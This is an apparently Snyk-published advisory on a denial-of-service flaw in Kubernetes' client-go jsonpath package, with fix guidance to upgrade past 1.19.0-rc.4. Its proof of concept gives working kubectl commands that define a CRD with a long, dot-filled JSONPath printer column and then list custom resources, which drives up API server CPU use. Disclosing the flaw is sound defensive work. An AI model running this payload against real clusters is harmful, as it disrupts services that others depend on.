Denial of Service (DoS) Affecting k8s.io/kubernetes/staging/src/k8s.io/client-go/util/jsonpath package, versions <1.19.0-rc.4
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsSnyk Learn
Learn about Denial of Service (DoS) vulnerabilities in an interactive lesson.
Start learning- Snyk IDSNYK-GOLANG-K8SIOKUBERNETESSTAGINGSRCK8SIOCLIENTGOUTILJSONPATH-597671
- published24 Jul 2020
- disclosed24 Jul 2020
- creditlazydog
Introduced: 24 Jul 2020
CVE NOT AVAILABLE CWE-400 (opens in a new tab)How to fix?
Upgrade k8s.io/kubernetes/staging/src/k8s.io/client-go/util/jsonpath to version 1.19.0-rc.4 or higher.
Overview
k8s.io/kubernetes/staging/src/k8s.io/client-go/util/jsonpath is an is a template engine using jsonpath syntax, which can be seen at http://goessner.net/articles/JsonPath/. In addition, it has {range} {end} function to iterate list and slice.
Affected versions of this package are vulnerable to Denial of Service (DoS). A user able to create CRDs could create a malicious CRD such that listing CRs will cause enormous amounts of CPU usage on the API server.
PoC
kubectl create -f - <<EOF
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
name: foos.example.com
spec:
group: example.com
scope: Namespaced
names:
plural: foos
singular: foo
kind: Foo
version: v1
additionalPrinterColumns:
- name: FOO
type: string
JSONPath: ........................................................................................................................................................................................................
EOF
kubectl create -f - <<EOF
apiVersion: example.com/v1
kind: Foo
metadata:
name: foo-cr
spec:
foo:
bar:
baz:
qux: data
EOF
kubectl get foo
The API server CPU usage significantly increases